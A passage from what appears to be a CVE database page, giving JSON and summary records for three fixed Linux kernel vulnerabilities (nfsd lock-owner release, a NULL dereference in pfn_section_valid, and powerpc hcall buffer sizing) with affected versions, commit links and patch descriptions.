                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.306",
                  "versionStartIncluding": "4.19.246",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.220",
                  "versionStartIncluding": "5.10.120",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.45",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.79",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.15",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.3",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.317",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.282",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.197",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.17.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.18.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix RELEASE_LOCKOWNER\n\nThe test on so_count in nfsd4_release_lockowner() is nonsense and\nharmful.  Revert to using check_for_locks(), changing that to not sleep.\n\nFirst: harmful.\nAs is documented in the kdoc comment for nfsd4_release_lockowner(), the\ntest on so_count can transiently return a false positive resulting in a\nreturn of NFS4ERR_LOCKS_HELD when in fact no locks are held.  This is\nclearly a protocol violation and with the Linux NFS client it can cause\nincorrect behaviour.\n\nIf RELEASE_LOCKOWNER is sent while some other thread is still\nprocessing a LOCK request which failed because, at the time that request\nwas received, the given owner held a conflicting lock, then the nfsd\nthread processing that LOCK request can hold a reference (conflock) to\nthe lock owner that causes nfsd4_release_lockowner() to return an\nincorrect error.\n\nThe Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it\nnever sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so\nit knows that the error is impossible.  It assumes the lock owner was in\nfact released so it feels free to use the same lock owner identifier in\nsome later locking request.\n\nWhen it does reuse a lock owner identifier for which a previous RELEASE\nfailed, it will naturally use a lock_seqid of zero.  However the server,\nwhich didn\u0027t release the lock owner, will expect a larger lock_seqid and\nso will respond with NFS4ERR_BAD_SEQID.\n\nSo clearly it is harmful to allow a false positive, which testing\nso_count allows.\n\nThe test is nonsense because ... well... it doesn\u0027t mean anything.\n\nso_count is the sum of three different counts.\n1/ the set of states listed on so_stateids\n2/ the set of active vfs locks owned by any of those states\n3/ various transient counts such as for conflicting locks.\n\nWhen it is tested against \u00272\u0027 it is clear that one of these is the\ntransient reference obtained by find_lockowner_str_locked().  It is not\nclear what the other one is expected to be.\n\nIn practice, the count is often 2 because there is precisely one state\non so_stateids.  If there were more, this would fail.\n\nIn my testing I see two circumstances when RELEASE_LOCKOWNER is called.\nIn one case, CLOSE is called before RELEASE_LOCKOWNER.  That results in\nall the lock states being removed, and so the lockowner being discarded\n(it is removed when there are no more references which usually happens\nwhen the lock state is discarded).  When nfsd4_release_lockowner() finds\nthat the lock owner doesn\u0027t exist, it returns success.\n\nThe other case shows an so_count of \u00272\u0027 and precisely one state listed\nin so_stateid.  It appears that the Linux client uses a separate lock\nowner for each file resulting in one lock state per lock owner, so this\ntest on \u00272\u0027 is safe.  For another client it might not be safe.\n\nSo this patch changes check_for_locks() to use the (newish)\nfind_any_file_locked() so that it doesn\u0027t take a reference on the\nnfs4_file and so never calls nfsd_file_put(), and so never sleeps.  With\nthis check is it safe to restore the use of check_for_locks() rather\nthan testing so_count against the mysterious \u00272\u0027."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T16:39:56.807Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/10d75984495f7fe62152c3b0dbfa3f0a6b739c9b"
        },
        {
          "url": "https://git.kernel.org/stable/c/99fb654d01dc3f08b5905c663ad6c89a9d83302f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6f8b3fcc62725e4129f2c0fd550d022d4a7685a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098"
        },
        {
          "url": "https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd"
        }
      ],
      "title": "nfsd: fix RELEASE_LOCKOWNER",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26629",
    "datePublished": "2024-03-13T14:01:49.452Z",
    "dateReserved": "2024-02-19T14:20:24.135Z",
    "dateUpdated": "2025-12-23T16:39:56.807Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41055 (GCVE-0-2024-41055)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:32 – Updated: 2025-11-03 21:59

Title

mm: prevent derefencing NULL ptr in pfn_section_valid()

Summary

In the Linux kernel, the following vulnerability has been resolved: mm: prevent derefencing NULL ptr in pfn_section_valid() Commit 5ec8e8ea8b77 ("mm/sparsemem: fix race in accessing memory_section->usage") changed pfn_section_valid() to add a READ_ONCE() call around "ms->usage" to fix a race with section_deactivate() where ms->usage can be cleared. The READ_ONCE() call, by itself, is not enough to prevent NULL pointer dereference. We need to check its value before dereferencing it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0100aeb8a12d51950…
	https://git.kernel.org/stable/c/bc17f2377818dca64…
	https://git.kernel.org/stable/c/941e816185661bf2b…
	https://git.kernel.org/stable/c/797323d1cf92d09b7…
	https://git.kernel.org/stable/c/adccdf702b4ea913d…
	https://git.kernel.org/stable/c/82f0b6f041fad768c…

Impacted products

Vendor

Product

Version

Linux

Affected: 90ad17575d26874287271127d43ef3c2af876cea , < 0100aeb8a12d51950418e685f879cc80cb8e5982 (git)
Affected: b448de2459b6d62a53892487ab18b7d823ff0529 , < bc17f2377818dca643a74499c3f5333500c90503 (git)
Affected: 68ed9e33324021e9d6b798e9db00ca3093d2012a , < 941e816185661bf2b44b488565d09444ae316509 (git)
Affected: 70064241f2229f7ba7b9599a98f68d9142e81a97 , < 797323d1cf92d09b7a017cfec576d9babf99cde7 (git)
Affected: 5ec8e8ea8b7783fab150cf86404fc38cb4db8800 , < adccdf702b4ea913ded5ff512239e382d7473b63 (git)
Affected: 5ec8e8ea8b7783fab150cf86404fc38cb4db8800 , < 82f0b6f041fad768c28b4ad05a683065412c226e (git)
Affected: 3a01daace71b521563c38bbbf874e14c3e58adb7 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:54.292Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0100aeb8a12d51950418e685f879cc80cb8e5982"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bc17f2377818dca643a74499c3f5333500c90503"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/941e816185661bf2b44b488565d09444ae316509"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/797323d1cf92d09b7a017cfec576d9babf99cde7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/adccdf702b4ea913ded5ff512239e382d7473b63"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82f0b6f041fad768c28b4ad05a683065412c226e"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41055",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:28.194623Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:01.312Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/mmzone.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0100aeb8a12d51950418e685f879cc80cb8e5982",
              "status": "affected",
              "version": "90ad17575d26874287271127d43ef3c2af876cea",
              "versionType": "git"
            },
            {
              "lessThan": "bc17f2377818dca643a74499c3f5333500c90503",
              "status": "affected",
              "version": "b448de2459b6d62a53892487ab18b7d823ff0529",
              "versionType": "git"
            },
            {
              "lessThan": "941e816185661bf2b44b488565d09444ae316509",
              "status": "affected",
              "version": "68ed9e33324021e9d6b798e9db00ca3093d2012a",
              "versionType": "git"
            },
            {
              "lessThan": "797323d1cf92d09b7a017cfec576d9babf99cde7",
              "status": "affected",
              "version": "70064241f2229f7ba7b9599a98f68d9142e81a97",
              "versionType": "git"
            },
            {
              "lessThan": "adccdf702b4ea913ded5ff512239e382d7473b63",
              "status": "affected",
              "version": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
              "versionType": "git"
            },
            {
              "lessThan": "82f0b6f041fad768c28b4ad05a683065412c226e",
              "status": "affected",
              "version": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3a01daace71b521563c38bbbf874e14c3e58adb7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/mmzone.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.210",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.149",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1.76",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: prevent derefencing NULL ptr in pfn_section_valid()\n\nCommit 5ec8e8ea8b77 (\"mm/sparsemem: fix race in accessing\nmemory_section-\u003eusage\") changed pfn_section_valid() to add a READ_ONCE()\ncall around \"ms-\u003eusage\" to fix a race with section_deactivate() where\nms-\u003eusage can be cleared.  The READ_ONCE() call, by itself, is not enough\nto prevent NULL pointer dereference.  We need to check its value before\ndereferencing it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:33.295Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0100aeb8a12d51950418e685f879cc80cb8e5982"
        },
        {
          "url": "https://git.kernel.org/stable/c/bc17f2377818dca643a74499c3f5333500c90503"
        },
        {
          "url": "https://git.kernel.org/stable/c/941e816185661bf2b44b488565d09444ae316509"
        },
        {
          "url": "https://git.kernel.org/stable/c/797323d1cf92d09b7a017cfec576d9babf99cde7"
        },
        {
          "url": "https://git.kernel.org/stable/c/adccdf702b4ea913ded5ff512239e382d7473b63"
        },
        {
          "url": "https://git.kernel.org/stable/c/82f0b6f041fad768c28b4ad05a683065412c226e"
        }
      ],
      "title": "mm: prevent derefencing NULL ptr in pfn_section_valid()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41055",
    "datePublished": "2024-07-29T14:32:10.672Z",
    "dateReserved": "2024-07-12T12:17:45.627Z",
    "dateUpdated": "2025-11-03T21:59:54.292Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40974 (GCVE-0-2024-40974)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2026-01-05 10:37

Title

powerpc/pseries: Enforce hcall result buffer validity and size

Summary

In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: Enforce hcall result buffer validity and size plpar_hcall(), plpar_hcall9(), and related functions expect callers to provide valid result buffers of certain minimum size. Currently this is communicated only through comments in the code and the compiler has no idea. For example, if I write a bug like this: long retbuf[PLPAR_HCALL_BUFSIZE]; // should be PLPAR_HCALL9_BUFSIZE plpar_hcall9(H_ALLOCATE_VAS_WINDOW, retbuf, ...); This compiles with no diagnostics emitted, but likely results in stack corruption at runtime when plpar_hcall9() stores results past the end of the array. (To be clear this is a contrived example and I have not found a real instance yet.) To make this class of error less likely, we can use explicitly-sized array parameters instead of pointers in the declarations for the hcall APIs. When compiled with -Warray-bounds[1], the code above now provokes a diagnostic like this: error: array argument is too small; is of size 32, callee requires at least 72 [-Werror,-Warray-bounds] 60 | plpar_hcall9(H_ALLOCATE_VAS_WINDOW, retbuf, | ^ ~~~~~~ [1] Enabled for LLVM builds but not GCC for now. See commit 0da6e5fd6c37 ("gcc: disable '-Warray-bounds' for gcc-13 too") and related changes.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/acf2b80c31c37acab…
	https://git.kernel.org/stable/c/19c166ee42cf16d8b…
	https://git.kernel.org/stable/c/a8c988d752b3d98d5…
	https://git.kernel.org/stable/c/262e942ff5a839b9e…
	https://git.kernel.org/stable/c/8aa11aa001576bf3b…
	https://git.kernel.org/stable/c/3ad0034910a57aa88…
	https://git.kernel.org/stable/c/aa6107dcc4ce9a345…
	https://git.kernel.org/stable/c/ff2e185cf73df480e…

Impacted products

Vendor

Product

Version

Linux

Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < acf2b80c31c37acab040baa3cf5f19fbd5140b18 (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < 19c166ee42cf16d8b156a6cb4544122d9a65d3ca (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < a8c988d752b3d98d5cc1e3929c519a55ef55426c (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < 262e942ff5a839b9e4f3302a8987928b0c8b8a2d (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < 8aa11aa001576bf3b00dcb8559564ad7a3113588 (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < 3ad0034910a57aa88ed9976b1431b7b8c84e0048 (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < aa6107dcc4ce9a3451f2d729204713783b657257 (git)
Affected: b9377ffc3a03cde558d76349a262a1adbb6d3112 , < ff2e185cf73df480ec69675936c4ee75a445c3e4 (git)

Linux

Affected: 2.6.19
Unaffected: 0 , < 2.6.19 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:39.132Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/acf2b80c31c37acab040baa3cf5f19fbd5140b18"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/19c166ee42cf16d8b156a6cb4544122d9a65d3ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a8c988d752b3d98d5cc1e3929c519a55ef55426c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/262e942ff5a839b9e4f3302a8987928b0c8b8a2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8aa11aa001576bf3b00dcb8559564ad7a3113588"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ad0034910a57aa88ed9976b1431b7b8c84e0048"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa6107dcc4ce9a3451f2d729204713783b657257"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff2e185cf73df480ec69675936c4ee75a445c3e4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40974",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:02:44.463070Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:22.210Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/powerpc/include/asm/hvcall.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "acf2b80c31c37acab040baa3cf5f19fbd5140b18",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "19c166ee42cf16d8b156a6cb4544122d9a65d3ca",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "a8c988d752b3d98d5cc1e3929c519a55ef55426c",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "262e942ff5a839b9e4f3302a8987928b0c8b8a2d",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "8aa11aa001576bf3b00dcb8559564ad7a3113588",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "3ad0034910a57aa88ed9976b1431b7b8c84e0048",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "aa6107dcc4ce9a3451f2d729204713783b657257",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            },
            {
              "lessThan": "ff2e185cf73df480ec69675936c4ee75a445c3e4",
              "status": "affected",
              "version": "b9377ffc3a03cde558d76349a262a1adbb6d3112",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/powerpc/include/asm/hvcall.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.19"
            },
            {
              "lessThan": "2.6.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Enforce hcall result buffer validity and size\n\nplpar_hcall(), plpar_hcall9(), and related functions expect callers to\nprovide valid result buffers of certain minimum size. Currently this\nis communicated only through comments in the code and the compiler has\nno idea.\n\nFor example, if I write a bug like this:\n\n  long retbuf[PLPAR_HCALL_BUFSIZE]; // should be PLPAR_HCALL9_BUFSIZE\n  plpar_hcall9(H_ALLOCATE_VAS_WINDOW, retbuf, ...);\n\nThis compiles with no diagnostics emitted, but likely results in stack\ncorruption at runtime when plpar_hcall9() stores results past the end\nof the array. (To be clear this is a contrived example and I have not\nfound a real instance yet.)\n\nTo make this class of error less likely, we can use explicitly-sized\narray parameters instead of pointers in the declarations for the hcall\nAPIs. When compiled with -Warray-bounds[1], the code above now\nprovokes a diagnostic like this:\n\nerror: array argument is too small;\nis of size 32, callee requires at least 72 [-Werror,-Warray-bounds]\n   60 |                 plpar_hcall9(H_ALLOCATE_VAS_WINDOW, retbuf,\n      |                 ^                                   ~~~~~~\n\n[1] Enabled for LLVM builds but not GCC for now. See commit\n    0da6e5fd6c37 (\"gcc: disable \u0027-Warray-bounds\u0027 for gcc-13 too\") and\n    related changes."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:02.905Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/acf2b80c31c37acab040baa3cf5f19fbd5140b18"
        },
        {
          "url": "https://git.kernel.org/stable/c/19c166ee42cf16d8b156a6cb4544122d9a65d3ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/a8c988d752b3d98d5cc1e3929c519a55ef55426c"
        },
        {
          "url": "https://git.kernel.org/stable/c/262e942ff5a839b9e4f3302a8987928b0c8b8a2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8aa11aa001576bf3b00dcb8559564ad7a3113588"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ad0034910a57aa88ed9976b1431b7b8c84e0048"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa6107dcc4ce9a3451f2d729204713783b657257"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff2e185cf73df480ec69675936c4ee75a445c3e4"
        }
      ],
      "title": "powerpc/pseries: Enforce hcall result buffer validity and size",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40974",
    "datePublished": "2024-07-12T12:32:11.417Z",
    "dateReserved": "2024-07-12T12:17:45.603Z",
